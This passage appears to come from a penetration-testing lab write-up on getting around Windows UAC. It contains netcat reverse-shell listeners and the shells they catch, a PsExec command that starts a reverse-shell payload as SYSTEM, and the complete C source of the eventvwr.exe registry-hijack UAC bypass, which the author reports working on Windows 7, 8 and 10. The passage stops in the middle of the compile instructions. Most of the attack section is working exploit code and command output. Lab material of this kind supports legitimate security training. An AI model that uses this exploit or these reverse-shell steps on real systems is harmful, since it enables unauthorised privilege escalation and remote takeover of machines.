Specifically uncomment them and and change foobar.exe to the name of whatever program payload we want to run at High integrity. The exploit needs to be in the same folder as the payload. In this case it’ll be
root@Kali:~/PTP/Post Exploitation/Bypass UAC Lab 15# rlwrap -r nc -nlvp 4444
listening on [any] 4444 ...
connect to [172.50.50.50] from (UNKNOWN) [172.50.50.20] 49164
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami & whoami /priv
whoami & whoami /priv
els-win7\els
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
Wow, see the difference? Suddenly a whole host of other privileges appear though we are still the same admin. This is a High integrity shell. Now PsExec will work.
C:\BypassUAC>PsExec64.exe -i -accepteula -d -s C:\BypassUAC\reverse_3333.exe
PsExec64.exe -i -accepteula -d -s C:\BypassUAC\reverse_3333.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Starting C:\BypassUAC\reverse_3333.exe on ELS-WIN7...
C:\BypassUAC\reverse_3333.exe started on ELS-WIN7 with process ID 2244.
At listener
root@Kali:~/PTP/Post Exploitation/Bypass UAC Lab 15# rlwrap -r nc -nlvp 3333
listening on [any] 3333 ...
connect to [172.50.50.50] from (UNKNOWN) [172.50.50.20] 49167
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami && whoami /priv
whoami && whoami /priv
nt authority\system
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
Great. We now have SYSTEM. Now if you get errors about PSEXEC service, run tasklist and see if you can taskkill whatever PSEXEC service is running. Otherwise it should work.
eventvwr-bypassuac.c
/*
*https://raw.githubusercontent.com/turbo/zero2hero/master/main.c
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
/*
* Pretty standard code to recursively nuke a Reg Key
*/
int RegDelnodeRecurse (LPTSTR lpSubKey) {
LPTSTR lpEnd;
LONG lResult;
DWORD dwSize = MAX_PATH;
TCHAR szName[MAX_PATH];
HKEY hKey;
FILETIME ftWrite;
lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);
if (lResult == ERROR_SUCCESS) return 1;
lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);
if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;
lpEnd = lpSubKey + lstrlen(lpSubKey);
*lpEnd++ = '\\';
*lpEnd = '\0';
if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
do {
strcpy(lpEnd, szName);
if (!RegDelnodeRecurse(lpSubKey)) break;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
} while (lResult == ERROR_SUCCESS);
}
lpEnd--;
*lpEnd = TEXT('\0');
RegCloseKey(hKey);
return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}
/*
* Wrapper for above
*/
int RegDelnode() {
TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile";
return RegDelnodeRecurse(szDelKey);
}
void __c_exploitUAC() {
char curPath[MAX_PATH], evtVwr[MAX_PATH];
HKEY attackKey;
SHELLEXECUTEINFO exInfo;
/*
curPath is the command you want to elevate.
Below is an example that shows how to elevate
foobar.exe sitting in the same path as this
program.
*/
/*
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\foobar.exe");
*/
sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT"));
if(!RegDelnode()) return;
if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return;
RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));
exInfo.lpVerb = "open";
exInfo.lpFile = evtVwr;
exInfo.nShow = 0;
exInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
exInfo.cbSize = sizeof(SHELLEXECUTEINFO);
exInfo.hwnd = 0;
exInfo.lpParameters = 0;
exInfo.lpDirectory = 0;
exInfo.hInstApp = 0;
ShellExecuteEx(&exInfo);
Sleep(5000);
TerminateProcess(exInfo.hProcess, 0);
RegCloseKey(attackKey);
RegDelnode();
}
int main(int argc, char *argv[]) {
__c_exploitUAC();
return 0;
}
A writeup of how the exploit works is with a Powershell script, but in the comments, someone . I tested it confirm the C exploit works so let’s run through that. This exploit works on Windows 7, 8 and 10. Before using the exploit, it helps to ensure that eventvwr.exe exists and is set to autoelevate to High integrity.
For the above, I used by Sysinternals which is the same as the Linux tool. The page even says this program is backwards compatible with Win 95. Amazing. As always, pardon the square brackets.
Now we need to compile it for the appropriate OS architecture. The target system is x64 Windows, so on Kali to compile it
